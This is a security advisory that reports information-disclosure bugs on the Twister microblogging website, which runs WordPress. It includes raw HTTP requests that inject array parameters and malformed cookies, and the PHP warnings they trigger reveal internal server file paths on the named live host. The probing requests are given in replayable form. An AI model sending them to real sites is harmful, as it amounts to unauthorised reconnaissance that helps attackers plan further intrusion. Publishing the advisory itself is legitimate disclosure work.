TWISTER Peer-To-Peer microblogging Multiples Application Error Message ( and disclosing sensitive information)

2018.10.22
es Juan Carlos Garcia (ES) es
Risk: High
Local: Yes
Remote: Yes
CVE: N/A
CWE: N/A

TWISTER Peer-To-Peer microblogging Multiples Application Error Message ( and disclosing sensitive information) TIME-LINE VULNERABILITY Multiples Advisories but Not Response Not Fixed ----------------- Alerts summary ----------------- Application error message ********************** / author cat comment_author_email_46104838c3366e1644fd983230bdf8c5 comment_author_url_46104838c3366e1644fd983230bdf8c5 feed m s wordpress_46104838c3366e1644fd983230bdf8c5 wordpress_logged_in_46104838c3366e1644fd983230bdf8c5 /wp-comments-post.php author comment email url /wp-login.php comment_author_email_46104838c3366e1644fd983230bdf8c5 comment_author_url_46104838c3366e1644fd983230bdf8c5 redirect_to user_email user_login wordpress_46104838c3366e1644fd983230bdf8c5 wordpress_logged_in_46104838c3366e1644fd983230bdf8c5 I. VULNERABILITY ------------------------- #Title: TWISTER.NET Multiples Application Error Message ( disclose sensitive information) #Vendor:http://www.twister.net.co #Author:Juan Carlos García (@secnight) #Verified: Francisco Moraga (@BTShell) #http://asap-sec.com II. DESCRIPTION ------------------------- Twister Peer-to-peer microblogging is the fully decentralized P2P microblogging platform leveraging from the free software implementations of Bitcoin and BitTorrent protocols. III. PROOF OF CONCEPT ------------------------- --Attack details--- Application error message ------------------------- Vulnerability description ************************* This page contains an error/warning message that may disclose sensitive information. The message can also contain the location of the file that produced the unhandled exception. Affected items --------------- / /wp-comments-post.php /wp-login.php Cookie input comment_author_email_46104838c3366e1644fd983230bdf8c5 was set to sample%40email.tst Error message found: <b>Warning</b>: trim() expects parameter 1 to be string, array given in <b>/home/content/68/11448068/html/wp-includes/plugin.php</b> on line <b>199</b><br /> URL encoded GET input author was set to 1 Error message found: <b>Warning</b>: urldecode() expects parameter 1 to be string, array given in <b>/home/content/68/11448068/html/wp-includes/query.php</b> on line <b>2519</b><br /> GET /?author[$secnight]=1&feed=rss2 HTTP/1.1 Cookie: comment_author_46104838c3366e1644fd983230bdf8c5=1; comment_author_email_46104838c3366e1644fd983230bdf8c5=sample%40email.tst; comment_author_url_46104838c3366e1644fd983230bdf8c5=http%3A%2F%2F1; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_46104838c3366e1644fd983230bdf8c5=+; wordpress_46104838c3366e1644fd983230bdf8c5=+; wordpress_sec_46104838c3366e1644fd983230bdf8c5=+; wordpressuser_46104838c3366e1644fd983230bdf8c5=+; wordpresspass_46104838c3366e1644fd983230bdf8c5=+ X-Pingback: http://twister.net.co/xmlrpc.php Host: twister.net.co Connection: Keep-alive Accept-Encoding: gzip,deflate URL encoded GET input cat was set to 1 Error message found: <b>Warning</b>: urldecode() expects parameter 1 to be string, array given in <b>/home/content/68/11448068/html/wp-includes/query.php</b> on line <b>1771</b><br /> GET /?cat[$secnight]=1 HTTP/1.1 Cookie: comment_author_46104838c3366e1644fd983230bdf8c5=1; comment_author_email_46104838c3366e1644fd983230bdf8c5=sample%40email.tst; comment_author_url_46104838c3366e1644fd983230bdf8c5=http%3A%2F%2F1; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_46104838c3366e1644fd983230bdf8c5=+; wordpress_46104838c3366e1644fd983230bdf8c5=+; wordpress_sec_46104838c3366e1644fd983230bdf8c5=+; wordpressuser_46104838c3366e1644fd983230bdf8c5=+; wordpresspass_46104838c3366e1644fd983230bdf8c5=+ Host: twister.net.co Connection: Keep-alive Accept-Encoding: gzip,deflate Cookie input comment_author_url_46104838c3366e1644fd983230bdf8c5 was set to http%3A%2F%2F1 Error message found: <b>Warning</b>: strip_tags() expects parameter 1 to be string, array given in <b>/home/content/68/11448068/html/wp-includes/formatting.php</b> on line <b>3261</b><br /> GET / HTTP/1.1 Cookie: comment_author_46104838c3366e1644fd983230bdf8c5=1; comment_author_email_46104838c3366e1644fd983230bdf8c5=sample%40email.tst; comment_author_url_46104838c3366e1644fd983230bdf8c5[]=http%3A%2F%2F1; wordpress_test_cookie=WP+Cookie+check; wordpress_46104838c3366e1644fd983230bdf8c5=+; wordpress_sec_46104838c3366e1644fd983230bdf8c5=+; wordpress_46104838c3366e1644fd983230bdf8c5=+; wordpress_sec_46104838c3366e1644fd983230bdf8c5=+; wordpress_logged_in_46104838c3366e1644fd983230bdf8c5=+; wordpress_46104838c3366e1644fd983230bdf8c5=+; wordpress_sec_46104838c3366e1644fd983230bdf8c5=+; wordpressuser_46104838c3366e1644fd983230bdf8c5=+; wordpresspass_46104838c3366e1644fd983230bdf8c5=+ Referer: http://twister.net.co:80/ Host: twister.net.co Connection: Keep-alive Accept-Encoding: gzip,deflate URL encoded GET input feed was set to 1 Error message found: <b>Warning</b>: strpos() expects parameter 1 to be string, array given in <b>/home/content/68/11448068/html/wp-includes/class-wp.php</b> on line <b>331</b><br /> GET /?author=1&feed[$secnight]=1 HTTP/1.1 Cookie: comment_author_46104838c3366e1644fd983230bdf8c5=1; comment_author_email_46104838c3366e1644fd983230bdf8c5=sample%40email.tst; comment_author_url_46104838c3366e1644fd983230bdf8c5=http%3A%2F%2F1; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_46104838c3366e1644fd983230bdf8c5=+; wordpress_46104838c3366e1644fd983230bdf8c5=+; wordpress_sec_46104838c3366e1644fd983230bdf8c5=+; wordpressuser_46104838c3366e1644fd983230bdf8c5=+; wordpresspass_46104838c3366e1644fd983230bdf8c5=+ Host: twister.net.co Cookie input comment_author_email_46104838c3366e1644fd983230bdf8c5 was set to sample%40email.tst Error message found: <b>Warning</b>: trim() expects parameter 1 to be string, array given in <b>/home/content/68/11448068/html/wp-includes/plugin.php</b> on line <b>199</b><br /> GET /wp-login.php HTTP/1.1 Cookie: comment_author_46104838c3366e1644fd983230bdf8c5=1; comment_author_email_46104838c3366e1644fd983230bdf8c5[]=sample%40email.tst; comment_author_url_46104838c3366e1644fd983230bdf8c5=http%3A%2F%2F1; wordpress_test_cookie=WP+Cookie+check; wordpress_46104838c3366e1644fd983230bdf8c5=+; wordpress_sec_46104838c3366e1644fd983230bdf8c5=+; wordpress_46104838c3366e1644fd983230bdf8c5=+; wordpress_sec_46104838c3366e1644fd983230bdf8c5=+; wordpress_logged_in_46104838c3366e1644fd983230bdf8c5=+; wordpress_46104838c3366e1644fd983230bdf8c5=+; wordpress_sec_46104838c3366e1644fd983230bdf8c5=+; wordpressuser_46104838c3366e1644fd983230bdf8c5=+; wordpresspass_46104838c3366e1644fd983230bdf8c5=+ Referer: http://twister.net.co:80/ Host: twister.net.co Etc Etc Etc . . . IV. BUSINESS IMPACT ------------------------- The impact of this vulnerability: The error messages disclose sensitive information. This information can be used to launch further attacks. V SOLUTION ------------------------ Pentesting, Review and Write Secure Code. VI. CREDITS ------------------------- This vulnerability has been discovered by Juan Carlos García(@secnight) VII. LEGAL NOTICES ------------------------- The Author accepts no responsibility for any damage caused by the use or misuse of this information.


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top